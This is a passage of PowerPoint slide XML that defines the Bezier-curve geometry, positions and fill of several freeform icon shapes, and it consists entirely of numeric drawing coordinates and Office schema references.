                  <a:cubicBezTo>
                    <a:pt x="1639" y="206"/>
                    <a:pt x="1639" y="206"/>
                    <a:pt x="1639" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1644" y="211"/>
                    <a:pt x="1648" y="218"/>
                    <a:pt x="1647" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1647" y="234"/>
                    <a:pt x="1643" y="241"/>
                    <a:pt x="1637" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="981" y="724"/>
                    <a:pt x="981" y="724"/>
                    <a:pt x="981" y="724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="757"/>
                    <a:pt x="882" y="774"/>
                    <a:pt x="828" y="7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68" name="Freeform 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0344EB3D-D027-E44E-B73F-43FDB1C0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2503" y="4774160"/>
              <a:ext cx="176907" cy="152783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 447"/>
                <a:gd name="T1" fmla="*/ 382 h 382"/>
                <a:gd name="T2" fmla="*/ 9 w 447"/>
                <a:gd name="T3" fmla="*/ 373 h 382"/>
                <a:gd name="T4" fmla="*/ 12 w 447"/>
                <a:gd name="T5" fmla="*/ 338 h 382"/>
                <a:gd name="T6" fmla="*/ 402 w 447"/>
                <a:gd name="T7" fmla="*/ 9 h 382"/>
                <a:gd name="T8" fmla="*/ 438 w 447"/>
                <a:gd name="T9" fmla="*/ 12 h 382"/>
                <a:gd name="T10" fmla="*/ 435 w 447"/>
                <a:gd name="T11" fmla="*/ 48 h 382"/>
                <a:gd name="T12" fmla="*/ 45 w 447"/>
                <a:gd name="T13" fmla="*/ 377 h 382"/>
                <a:gd name="T14" fmla="*/ 28 w 447"/>
                <a:gd name="T15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7" h="382">
                  <a:moveTo>
                    <a:pt x="28" y="382"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="382"/>
                    <a:pt x="14" y="379"/>
                    <a:pt x="9" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="363"/>
                    <a:pt x="1" y="347"/>
                    <a:pt x="12" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="9"/>
                    <a:pt x="402" y="9"/>
                    <a:pt x="402" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="0"/>
                    <a:pt x="429" y="1"/>
                    <a:pt x="438" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="23"/>
                    <a:pt x="445" y="39"/>
                    <a:pt x="435" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="377"/>
                    <a:pt x="45" y="377"/>
                    <a:pt x="45" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="381"/>
                    <a:pt x="34" y="382"/>
                    <a:pt x="28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69" name="Freeform 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D55E71F-CC5D-094F-A88D-E9D5F4082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52399" y="4774160"/>
              <a:ext cx="176907" cy="152783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 419 w 447"/>
                <a:gd name="T1" fmla="*/ 382 h 382"/>
                <a:gd name="T2" fmla="*/ 402 w 447"/>
                <a:gd name="T3" fmla="*/ 377 h 382"/>
                <a:gd name="T4" fmla="*/ 12 w 447"/>
                <a:gd name="T5" fmla="*/ 48 h 382"/>
                <a:gd name="T6" fmla="*/ 9 w 447"/>
                <a:gd name="T7" fmla="*/ 12 h 382"/>
                <a:gd name="T8" fmla="*/ 45 w 447"/>
                <a:gd name="T9" fmla="*/ 9 h 382"/>
                <a:gd name="T10" fmla="*/ 435 w 447"/>
                <a:gd name="T11" fmla="*/ 338 h 382"/>
                <a:gd name="T12" fmla="*/ 438 w 447"/>
                <a:gd name="T13" fmla="*/ 373 h 382"/>
                <a:gd name="T14" fmla="*/ 419 w 447"/>
                <a:gd name="T15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7" h="382">
                  <a:moveTo>
                    <a:pt x="419" y="382"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="382"/>
                    <a:pt x="407" y="381"/>
                    <a:pt x="402" y="377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2" y="39"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="9" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="1"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="45" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="435" y="338"/>
                    <a:pt x="435" y="338"/>
                    <a:pt x="435" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="347"/>
                    <a:pt x="447" y="363"/>
                    <a:pt x="438" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="379"/>
                    <a:pt x="426" y="382"/>
                    <a:pt x="419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70" name="Freeform 781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4DFA5A-7631-9243-A49A-852CEC4D7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0811" y="4368883"/>
              <a:ext cx="371504" cy="273401"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 908 w 934"/>
                <a:gd name="T1" fmla="*/ 687 h 687"/>
                <a:gd name="T2" fmla="*/ 883 w 934"/>
                <a:gd name="T3" fmla="*/ 661 h 687"/>
                <a:gd name="T4" fmla="*/ 883 w 934"/>
                <a:gd name="T5" fmla="*/ 176 h 687"/>
                <a:gd name="T6" fmla="*/ 758 w 934"/>
                <a:gd name="T7" fmla="*/ 51 h 687"/>
                <a:gd name="T8" fmla="*/ 26 w 934"/>
                <a:gd name="T9" fmla="*/ 51 h 687"/>
                <a:gd name="T10" fmla="*/ 0 w 934"/>
                <a:gd name="T11" fmla="*/ 26 h 687"/>
                <a:gd name="T12" fmla="*/ 26 w 934"/>
                <a:gd name="T13" fmla="*/ 0 h 687"/>
                <a:gd name="T14" fmla="*/ 758 w 934"/>
                <a:gd name="T15" fmla="*/ 0 h 687"/>
                <a:gd name="T16" fmla="*/ 934 w 934"/>
                <a:gd name="T17" fmla="*/ 176 h 687"/>
                <a:gd name="T18" fmla="*/ 934 w 934"/>
                <a:gd name="T19" fmla="*/ 661 h 687"/>
                <a:gd name="T20" fmla="*/ 908 w 934"/>
                <a:gd name="T21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4" h="687">
                  <a:moveTo>
                    <a:pt x="908" y="687"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="687"/>
                    <a:pt x="883" y="675"/>
                    <a:pt x="883" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="883" y="176"/>
                    <a:pt x="883" y="176"/>
                    <a:pt x="883" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="883" y="107"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="758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12" y="51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758" y="0"/>
                    <a:pt x="758" y="0"/>
                    <a:pt x="758" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="0"/>
                    <a:pt x="934" y="79"/>
                    <a:pt x="934" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="661"/>
                    <a:pt x="934" y="661"/>
                    <a:pt x="934" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="675"/>
                    <a:pt x="922" y="687"/>
                    <a:pt x="908" y="6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71" name="Freeform 782">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2AAF65-C5F7-3944-9FD7-331A09C89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5018" y="4368882"/>
              <a:ext cx="86845" cy="262144"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 220"/>
                <a:gd name="T1" fmla="*/ 659 h 659"/>
                <a:gd name="T2" fmla="*/ 0 w 220"/>
                <a:gd name="T3" fmla="*/ 633 h 659"/>
                <a:gd name="T4" fmla="*/ 0 w 220"/>
                <a:gd name="T5" fmla="*/ 176 h 659"/>
                <a:gd name="T6" fmla="*/ 176 w 220"/>
                <a:gd name="T7" fmla="*/ 0 h 659"/>
                <a:gd name="T8" fmla="*/ 195 w 220"/>
                <a:gd name="T9" fmla="*/ 0 h 659"/>
                <a:gd name="T10" fmla="*/ 220 w 220"/>
                <a:gd name="T11" fmla="*/ 26 h 659"/>
                <a:gd name="T12" fmla="*/ 195 w 220"/>
                <a:gd name="T13" fmla="*/ 51 h 659"/>
                <a:gd name="T14" fmla="*/ 176 w 220"/>
                <a:gd name="T15" fmla="*/ 51 h 659"/>
                <a:gd name="T16" fmla="*/ 51 w 220"/>
                <a:gd name="T17" fmla="*/ 176 h 659"/>
                <a:gd name="T18" fmla="*/ 51 w 220"/>
                <a:gd name="T19" fmla="*/ 633 h 659"/>
                <a:gd name="T20" fmla="*/ 25 w 220"/>
                <a:gd name="T21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" h="659">
                  <a:moveTo>
                    <a:pt x="25" y="659"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="659"/>
                    <a:pt x="0" y="647"/>
                    <a:pt x="0" y="633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79"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="176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209" y="0"/>
                    <a:pt x="220" y="12"/>
                    <a:pt x="220" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="40"/>
                    <a:pt x="209" y="51"/>
                    <a:pt x="195" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="51"/>
                    <a:pt x="176" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="51"/>
                    <a:pt x="51" y="107"/>
                    <a:pt x="51" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="633"/>
                    <a:pt x="51" y="633"/>
                    <a:pt x="51" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="647"/>
                    <a:pt x="39" y="659"/>
                    <a:pt x="25" y="6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73" name="Freeform 783">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD83D677-C9F4-FF4E-BD8F-AA8930773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5430" y="4466984"/>
              <a:ext cx="332907" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 813 w 838"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 838"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 838"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 838"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 813 w 838"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 838 w 838"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 813 w 838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8" h="51">
                  <a:moveTo>
                    <a:pt x="813" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51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813" y="0"/>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="0"/>
                    <a:pt x="838" y="11"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="838" y="39"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="81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78" name="Freeform 784">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A383029-D4A1-3B4B-B5AB-649485D90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5430" y="4529706"/>
              <a:ext cx="229979" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 555 w 580"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 580"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 580"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 580"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 555 w 580"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 580 w 580"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 555 w 580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0" h="50">
                  <a:moveTo>
                    <a:pt x="555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69" y="0"/>
                    <a:pt x="580" y="11"/>
                    <a:pt x="580" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="39"/>
                    <a:pt x="569" y="50"/>
                    <a:pt x="555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81" name="Freeform 785">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4044346-780B-F440-ABEF-4AA813625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1141" y="4529706"/>
              <a:ext cx="69155" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 172"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 172"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 172"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 172"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 147 w 172"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 172 w 172"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 147 w 172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50">
                  <a:moveTo>
                    <a:pt x="147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61" y="0"/>
                    <a:pt x="172" y="11"/>
                    <a:pt x="172" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="39"/>
                    <a:pt x="161" y="50"/>
                    <a:pt x="14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82" name="Freeform 786">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F82620-E150-E14D-B0E5-E5125BF8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5430" y="4592427"/>
              <a:ext cx="332907" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 813 w 838"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 838"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 838"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 838"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 813 w 838"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 838 w 838"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 813 w 838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8" h="51">
                  <a:moveTo>
                    <a:pt x="813" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51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813" y="0"/>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="0"/>
                    <a:pt x="838" y="11"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="838" y="39"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="81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83" name="Freeform 787">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFB7EB4-E9DA-1247-9E0D-2719F5846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110" y="4655150"/>
              <a:ext cx="231587" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 555 w 580"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 580"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 580"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 580"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 555 w 580"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 580 w 580"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 555 w 580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0" h="50">
                  <a:moveTo>
                    <a:pt x="555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69" y="0"/>
                    <a:pt x="580" y="11"/>
                    <a:pt x="580" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="39"/>
                    <a:pt x="569" y="50"/>
                    <a:pt x="555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611A673-7DE1-C34A-AD2E-C9F000CAF083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3426402" y="3524997"/>
            <a:ext cx="324240" cy="378557"/>
            <a:chOff x="10228824" y="4282038"/>
            <a:chExt cx="623998" cy="728533"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="Freeform 1028">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B80283-2793-F74C-BD8D-B560F1141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926" y="4835273"/>
              <a:ext cx="115793" cy="22515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 264 w 292"/>
                <a:gd name="T1" fmla="*/ 57 h 57"/>
                <a:gd name="T2" fmla="*/ 28 w 292"/>
                <a:gd name="T3" fmla="*/ 57 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 292"/>
                <a:gd name="T5" fmla="*/ 29 h 57"/>
                <a:gd name="T6" fmla="*/ 28 w 292"/>
                <a:gd name="T7" fmla="*/ 0 h 57"/>
                <a:gd name="T8" fmla="*/ 264 w 292"/>
                <a:gd name="T9" fmla="*/ 0 h 57"/>
                <a:gd name="T10" fmla="*/ 292 w 292"/>
                <a:gd name="T11" fmla="*/ 29 h 57"/>
                <a:gd name="T12" fmla="*/ 264 w 292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" h="57">
                  <a:moveTo>
                    <a:pt x="264" y="57"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="57"/>
                    <a:pt x="0" y="44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9" y="0"/>
                    <a:pt x="292" y="13"/>
                    <a:pt x="292" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="44"/>
                    <a:pt x="279" y="57"/>
                    <a:pt x="26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90" name="Freeform 1029">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D555113C-27C4-B246-B7BD-94FA98E9F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926" y="4894778"/>
              <a:ext cx="311999" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 757 w 783"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 783"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 783"/>
                <a:gd name="T5" fmla="*/ 26 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 783"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 757 w 783"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
                <a:gd name="T10" fmla="*/ 783 w 783"/>
                <a:gd name="T11" fmla="*/ 26 h 53"/>
                <a:gd name="T12" fmla="*/ 757 w 783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3" h="53">
                  <a:moveTo>
                    <a:pt x="757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11" y="53"/>
                    <a:pt x="0" y="41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757" y="0"/>
                    <a:pt x="757" y="0"/>
                    <a:pt x="757" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="772" y="0"/>
                    <a:pt x="783" y="12"/>
                    <a:pt x="783" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="783" y="41"/>
                    <a:pt x="772" y="53"/>
                    <a:pt x="75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91" name="Freeform 1030">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDA39DA-65E7-5648-AA8C-D503728F8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926" y="4778985"/>
              <a:ext cx="59505" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 120 w 146"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 146"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 146"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 146"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 120 w 146"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 146 w 146"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 120 w 14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52">
                  <a:moveTo>
                    <a:pt x="120" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="41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4" y="0"/>
                    <a:pt x="146" y="12"/>
                    <a:pt x="146" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="41"/>
                    <a:pt x="134" y="52"/>
                    <a:pt x="12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92" name="Freeform 1031">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF6E5ABE-93E8-9E47-8F67-0AB721B84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926" y="4663190"/>
              <a:ext cx="49856" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 123"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 123"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 123"/>
                <a:gd name="T5" fmla="*/ 27 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 123"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 96 w 123"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
                <a:gd name="T10" fmla="*/ 123 w 123"/>
                <a:gd name="T11" fmla="*/ 27 h 53"/>
                <a:gd name="T12" fmla="*/ 96 w 123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3">
                  <a:moveTo>
                    <a:pt x="9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11" y="53"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="27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11" y="0"/>
                    <a:pt x="123" y="12"/>
                    <a:pt x="123" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="41"/>
                    <a:pt x="111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93" name="Freeform 1032">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2F17D8-160F-3543-B9E1-F7B0FD08E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926" y="4721088"/>
              <a:ext cx="45031" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 86 w 112"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 112"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 112"/>
                <a:gd name="T5" fmla="*/ 26 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 112"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 86 w 112"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
                <a:gd name="T10" fmla="*/ 112 w 112"/>
                <a:gd name="T11" fmla="*/ 26 h 53"/>
                <a:gd name="T12" fmla="*/ 86 w 112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53">
                  <a:moveTo>
                    <a:pt x="8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11" y="53"/>
                    <a:pt x="0" y="41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1" y="0"/>
                    <a:pt x="112" y="12"/>
                    <a:pt x="112" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="41"/>
                    <a:pt x="101" y="53"/>
                    <a:pt x="8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94" name="Freeform 1033">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F6091CA-5C56-1E49-B566-CD581291D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926" y="4605294"/>
              <a:ext cx="59505" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 122 w 148"/>
                <a:gd name="T1" fmla="*/ 52 h 52"/>
                <a:gd name="T2" fmla="*/ 26 w 148"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 148"/>
                <a:gd name="T5" fmla="*/ 26 h 52"/>
                <a:gd name="T6" fmla="*/ 26 w 148"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 122 w 148"/>
                <a:gd name="T9" fmla="*/ 0 h 52"/>
                <a:gd name="T10" fmla="*/ 148 w 148"/>
                <a:gd name="T11" fmla="*/ 26 h 52"/>
                <a:gd name="T12" fmla="*/ 122 w 14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52">
                  <a:moveTo>
                    <a:pt x="122" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                    <a:pt x="26" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="52"/>
                    <a:pt x="0" y="41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6" y="0"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="41"/>
                    <a:pt x="136" y="52"/>
                    <a:pt x="122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95" name="Freeform 1034">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC8EEEE-B760-0B4A-8DF8-A071EBBD7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926" y="4545790"/>
              <a:ext cx="119010" cy="22515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 271 w 299"/>
